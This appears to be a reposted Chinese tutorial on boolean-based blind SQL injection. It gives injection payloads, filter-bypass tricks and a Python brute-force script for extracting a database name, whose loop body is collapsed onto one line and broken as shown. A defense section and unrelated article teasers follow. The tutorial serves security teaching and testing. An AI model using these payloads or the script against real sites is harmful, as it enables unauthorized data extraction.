深入解析布尔注入:原理、实战与防御

目录

一、布尔注入的原理与核心逻辑

二、布尔注入的实战步骤

三、关键函数与绕过技巧

四、实战案例:获取数据库名称

五、防御策略与最佳实践

六、总结


一、布尔注入的原理与核心逻辑

布尔注入(Boolean-Based Blind SQL Injection)是一种通过构造特定SQL语句,利用应用程序对​​真(True)​​与​​假(False)​​的响应差异来推断数据库信息的攻击技术。其核心在于:

  1. ​逻辑条件构造​​:通过ANDOR连接布尔表达式(如1=11=2),触发不同的页面状态。
  2. ​响应差异判断​​:若条件为真,页面正常显示(如返回数据);若为假,页面异常(如无数据或错误提示)。
  3. ​信息逐位推断​​:结合字符串截取和ASCII码转换函数,通过二分法或遍历法猜测数据库的字符内容。

​示例​​:
当注入' AND 1=1 --时页面正常,而' AND 1=2 --时页面异常,即可确认存在布尔注入漏洞。


二、布尔注入的实战步骤
  1. ​确定注入点​

    • 测试参数(如URL中的id或表单字段)是否存在可注入性,例如:
      ?id=1' AND 1=1 -- (正常)
      ?id=1' AND 1=2 -- (异常)
    • 若响应状态差异明显,则可能存在布尔注入漏洞。
  2. ​验证布尔注入可行性​

    • 构造逻辑条件测试响应一致性,例如:
      ' AND (SELECT 1)=1 -- (正常)
      ' AND (SELECT 1)=2 -- (异常)
    • 确认后即可进入数据提取阶段。
  3. ​数据提取:长度与字符猜测​

    • ​长度判断​​:
      ' AND LENGTH(database())=8 -- (若正常则库名长度为8)[10](@ref)
    • ​逐字符猜测​​:
      ' AND ASCII(SUBSTRING(database(),1,1))=116 -- (ASCII 116对应字符't')[5,10](@ref)
    • ​自动化工具辅助​​:
      • 使用sqlmap --technique=B自动化探测;
      • 利用Burp Suite Intruder进行批量字符遍历。

三、关键函数与绕过技巧
  1. ​常用函数​

    • SUBSTRING(str, pos, len):截取字符串(如SUBSTRING(database(),1,1))。
    • ASCII(char):获取字符的ASCII码值(如ASCII('a')=97)。
    • LENGTH(str):判断字段长度(如LENGTH(user())=5)。
  2. ​绕过过滤的技巧​

    • 使用MID替代SUBSTRING,或ORD替代ASCII
    • 十六进制编码绕过关键词检测(如SUBSTR%69%6E%67)。
    • 时间盲注结合布尔条件(如AND IF(1=1,SLEEP(5),0))。

四、实战案例:获取数据库名称
  1. ​步骤拆解​

    • ​判断长度​​:
      /page.php?id=1' AND LENGTH(DATABASE())=4 -- (若正常,则库名长度4)[10](@ref)
    • ​逐字符猜测​​:
      /page.php?id=1' AND ASCII(SUBSTRING(DATABASE(),1,1))=116 -- (字符't')[10](@ref)
    • ​循环遍历​​:依次修改截取位置(如SUBSTRING(DATABASE(),2,1))直到获取完整名称(如test)。
  2. ​Python自动化脚本示例​

    import requests
    url = "http://example.com/page.php?id=1' AND ASCII(SUBSTRING(DATABASE(),{},1))={} --"
    result = ""
    for i in range(1, 5):for code in range(32, 127):payload = url.format(i, code)r = requests.get(payload)if "正常页面特征" in r.text:result += chr(code)break
    print("Database:", result)  # 输出:test

五、防御策略与最佳实践
  1. ​输入过滤与验证​

    • 严格校验参数类型(如数字型参数仅允许数字)。
    • 过滤敏感字符(如单引号'、注释符--)。
  2. ​参数化查询​

    • 使用预编译语句(如PDO或MyBatis),避免SQL拼接:
      $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
      $stmt->execute([$username]);
  3. ​最小权限原则​

    • 数据库账户仅授予必要权限(如禁止xp_cmdshell)。
  4. ​错误信息隐藏​

    • 禁止返回详细数据库错误(如屏蔽mysql_error())。
  5. ​Web应用防火墙(WAF)​

    • 部署规则拦截常见注入特征(如AND 1=1SLEEP(5))。

六、总结

布尔注入是一种隐蔽性强、危害大的攻击方式,其核心在于利用逻辑条件与响应差异逐步窃取数据。防御需从代码规范(如参数化查询)、权限控制、错误处理等多维度构建安全防线。对于渗透测试人员,掌握自动化工具(如sqlmap)与手动脚本的结合使用,可大幅提升攻击效率。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/79244.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

OpenGL学习笔记(几何着色器、实例化、抗锯齿)

目录 几何着色器爆破物体法向量可视化 实例化(偏移量存在uniform中)实例化数组(偏移量存在顶点属性中)小行星带 抗锯齿SSAA(Super Sample Anti-aliasing)MSAA(Multi-Sampling Anti-aliasing&…

idea报错java: 非法字符: ‘\ufeff‘解决方案

解决方案步骤以及说明 BOM是什么?1. BOM的作用2. 为什么会出现 \ufeff 错误?3. 如何解决 \ufeff 问题? 最后重新编译,即可运行!!! BOM是什么? \ufeff 是 Unicode 中的 BOM&#xff0…

open webui 介绍 是一个可扩展、功能丰富且用户友好的本地部署 AI 平台,支持完全离线运行。

AI MCP 系列 AgentGPT-01-入门介绍 Browser-use 是连接你的AI代理与浏览器的最简单方式 AI MCP(大模型上下文)-01-入门介绍 AI MCP(大模型上下文)-02-awesome-mcp-servers 精选的 MCP 服务器 AI MCP(大模型上下文)-03-open webui 介绍 是一个可扩展、功能丰富且用户友好的…

Log4j2远程命令执行(CVE-2021-44228)复现

这里选择使用vulfocue的靶场来进行复现 描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用…

模型提示词

一 提示词 (一) 提示词(Prompt)是用户发送给大语言模型的问题、指令或请求,** 1 来明确地告诉模型用户想要解决的问题或完成的任务,是大语言模型理解用户需求并据此生成相关、准确回答或内容的基础。对于…

深度学习算法:从基础到实践

简介 深度学习作为人工智能领域的一个重要分支,近年来在多个领域取得了显著的成就。本文将从基础概念出发,探讨深度学习算法的核心原理,并介绍一些实际应用案例。 深度学习算法的核心概念 深度学习算法基于人工神经网络,通过构…

5.9 《GPT-4调试+测试金字塔:构建高可靠系统的5大实战策略》

5.4 测试与调试:构建企业级质量的保障体系 关键词:测试金字塔模型、GPT-4调试助手、LangChain调试模式、异步任务验证 测试策略设计(测试金字塔实践) #mermaid-svg-RblGbJVMnCIShiCW {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill…

Visio绘图工具全面科普:解锁专业图表绘制新境界[特殊字符]

Visio绘图工具全面科普:解锁专业图表绘制新境界🌟 在信息爆炸的时代,清晰、直观地呈现复杂信息变得至关重要。无论是绘制流程图📊、组织结构图👥,还是规划网络拓扑🖧,一款强大的绘图…

ShellScript脚本编程

语法基础 脚本结构 我们先从这个小demo程序来窥探一下我们shell脚本的程序结构 #!/bin/bash# 注释信息echo_str"hello world"test(){echo $echo_str }test echo_str 首先我们可以通过文本编辑器(在这里我们使用linux自带文本编辑神器vim),新建一个文件…

你了解哪些Java限流算法?

大家好,我是锋哥。今天分享关于【你了解哪些Java限流算法?】面试题。希望对大家有帮助; 你了解哪些Java限流算法? 1000道 互联网大厂Java工程师 精选面试题-Java资源分享网 在 Java 中,限流算法广泛用于控制流量、避免过载和保护系统的稳…

prime-2 靶场笔记(vuInhub靶场)

前言: 在本次靶场环境中涉及的知识点,主要包含LFI和SMB以及Lxd组提权,具体内容包括主机探测、端口扫描、目录扫描、wpscan扫描、反弹shell、一句话木马、容器、linux各种提权和维持。 环境介绍: 本靶场使用了kali(192…

SparseDrive---论文阅读

纯视觉下的稀疏场景表示 算法动机&开创性思路 算法动机: 依赖于计算成本高昂的鸟瞰图(BEV)特征表示。预测和规划的设计过于直接,没有充分利用周围代理和自我车辆之间的高阶和双向交互。场景信息是在agent周围提取&#xff…

旅游特种兵迪士尼大作战:DeepSeek高精准路径优化

DeepSeek大模型高性能核心技术与多模态融合开发 - 商品搜索 - 京东 随着假期的脚步日渐临近,环球影城等备受瞩目的主题游乐场,已然成为大人与孩子们心中不可或缺的节日狂欢圣地。然而,随之而来的庞大客流,却总让无数游客在欢乐的…

android rtsp 拉流h264 h265,解码nv12转码nv21耗时卡顿问题及ffmpeg优化

一、 背景介绍及问题概述 项目需求需要在rk3568开发板上面,通过rtsp协议拉流的形式获取摄像头预览,然后进行人脸识别 姿态识别等后续其它操作。由于rtsp协议一般使用h.264 h265视频编码格式(也叫 AVC 和 HEVC)是不能直接用于后续处…

运维面试题(十四)

6.将日志从一台服务器保存到另一台服务器中的方法 1.使用 rsync 同步日志文件 2.使用 scp 手动或脚本化传输 3.配置日志服务(如 syslog 或 rsyslog )远程传输  4.编写脚本定时上传:结合 cron 定时任务和传输工具,编…

永磁同步电机控制中,滑模观测器是基于反电动势观测转子速度和角度的?扩展卡尔曼滤波观测器是基于什么观测的?扩展卡尔曼滤波观测器也是基于反电动势吗?

滑模观测器在PMSM中的应用: 滑模观测器是一种非线性观测器,利用切换函数设计,使得状态估计误差迅速趋近于零,实现快速响应和对外部干扰的鲁棒性。 在永磁同步电机(PMSM)无传感器控制中,滑模观测…

【前端】Vue一本通 ESLint JSX

近几天更新完毕,不定期持续更新,建议关注收藏点赞。 目录 工具推荐vscode插件vue-devtoolsESLint JSX语法扩展简介设计模式快速入门 vue/cli脚手架使用vue指令 工具推荐 工欲善其事,必先利其器。 vscode插件 Vetur:vue代码高亮…

【adb】bat批处理+adb 自动亮屏,自动解锁屏幕,启动王者荣耀

准备adb 下载 需要确认是否安装了adb.exe文件,可以在: 任务管理器 -->详细信息–>找一下后台运行的adb 安装过anroid模拟器,也存在adb,例如:雷电安装目录 D:\leidian\LDPlayer9 单独下载adb 官方下载地址:[官方网址] 下载目录文件: 测试adb USB连接手机 首先在设置界…

微信小程序转为App实践篇 FinClip

参考下面链接先 开始实践 微信小程序转为App并上架应用市场_微信小程序生成app-CSDN博客 首先在FinClip 官网上下载应用 小程序开发工具下载_小程序sdk下载资源-FinClip资源下载|泰坪小程序开放平台 下载到本地安装 打开导入自己的小程序项目;导入时会解析自己的…

arco design框架中的树形表格使用中的缓存问题

目录 1.问题 2.解决方案 1.问题 arco design框架中的树形表格使用中的缓存问题,使用了树形表格的load-more懒加载 点击展开按钮后,点击关闭,再次点击展开按钮时,没有调用查询接口,而是使用了缓存的数据。 2.解决方…